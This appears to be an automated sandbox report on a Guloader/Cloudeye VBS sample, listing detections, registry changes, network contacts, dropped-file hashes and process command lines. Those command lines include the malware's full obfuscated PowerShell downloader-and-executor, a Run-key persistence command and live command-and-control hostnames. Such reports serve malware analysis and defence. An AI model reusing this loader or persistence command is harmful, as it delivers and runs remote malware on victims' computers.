Analysis Overview
SHA256
e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764
Threat Level: Known bad
The file e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader, Cloudeye
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-10 02:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-10 02:26
Reported
2024-07-10 02:28
Platform
win7-20240704-en
Max time kernel
122s
Max time network
125s
Command Line
Signatures
Guloader, Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Svumpukler = "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\\Darrick\\').Huldre;%Tekstmarkeringens130% ($Beholdtes)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2992 set thread context of 2128 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. 
,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. 
U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" (command line identical to the first System32 powershell.exe command line listed under behavioral1)
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | milanaces.com | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 23.200.147.33:80 | r10.o.lencr.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabBC8D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M8CJEUIQV7M7I4AYAZ21.temp
| MD5 | 11f3f7d60787cd1bdeaaa3aacb679ed6 |
| SHA1 | f4797ee086328307813aae5772aa356d269c5128 |
| SHA256 | 44299df9a44958035faec163cda832619fa651504931d6d46e50cbf2a0c60152 |
| SHA512 | 429e7898925e2b1835a647a3b3b61f02d54fb1b64fe6fa1d2c8388908b831a8c7a4756a8e625acd4f6877143878b0378dd2d5c3d4913ed5880d0282a551a8136 |
C:\Users\Admin\AppData\Roaming\Kubikcentimeter.Gua
| MD5 | 8fc3031fccbd90ac8beb25c3ce089816 |
| SHA1 | 95e5412e39afc737103ab2e516642e9952c366e9 |
| SHA256 | 7ab6a49072545cc0f6da993333894c81fee597e41129379d30c3b4f249667343 |
| SHA512 | 8852b4efe8f23c6c01b0a500eacb1d8ce38426516da706435addd641cd1b32d024109f1d6a123b9672f173362caae707f87dbb2a8f32ec3325d3a9e5bd43f11b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3f4e7da9a3dbc98f3c35c94806fbe30b |
| SHA1 | e72333e6f323db8f183fe5a87c54c4a1d6686abf |
| SHA256 | e17fb113d885eefa84a5658728f94f54901efae139546213e169a0615bf181c5 |
| SHA512 | f3a8a9510325dbc8bbdbf24d2f9484174331a24dbf1861952a39a3de8a061d8baba923d4e8579cb7282b495d33593ec1e675c4d3ae0518a1dc321483994f1b16 |
C:\Users\Admin\AppData\Local\Temp\Tar7ADC.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-10 02:26
Reported
2024-07-10 02:29
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Guloader, Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svumpukler = "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\\Darrick\\').Huldre;%Tekstmarkeringens130% ($Beholdtes)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1540 set thread context of 2264 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (command line identical to the first System32 powershell.exe command line listed under behavioral1)
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" (command line identical to the first System32 powershell.exe command line listed under behavioral1)
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | milanaces.com | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | 108.216.25.193.in-addr.arpa | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 23.200.147.11:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.147.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | janbours92harbu02.duckdns.org | udp |
| US | 192.169.69.26:3980 | janbours92harbu02.duckdns.org | tcp |
| US | 192.169.69.26:3981 | janbours92harbu02.duckdns.org | tcp |
| US | 8.8.8.8:53 | 26.69.169.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | janbours92harbu03.duckdns.org | udp |
| BE | 172.111.244.40:3980 | janbours92harbu03.duckdns.org | tcp |
| US | 8.8.8.8:53 | 40.244.111.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | janbours92harbu02.duckdns.org | udp |
| US | 192.169.69.26:3980 | janbours92harbu02.duckdns.org | tcp |
| US | 192.169.69.26:3981 | janbours92harbu02.duckdns.org | tcp |
| US | 8.8.8.8:53 | janbours92harbu03.duckdns.org | udp |
| BE | 172.111.244.40:3980 | janbours92harbu03.duckdns.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtczaukc.pnc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Kubikcentimeter.Gua
| MD5 | 8fc3031fccbd90ac8beb25c3ce089816 |
| SHA1 | 95e5412e39afc737103ab2e516642e9952c366e9 |
| SHA256 | 7ab6a49072545cc0f6da993333894c81fee597e41129379d30c3b4f249667343 |
| SHA512 | 8852b4efe8f23c6c01b0a500eacb1d8ce38426516da706435addd641cd1b32d024109f1d6a123b9672f173362caae707f87dbb2a8f32ec3325d3a9e5bd43f11b |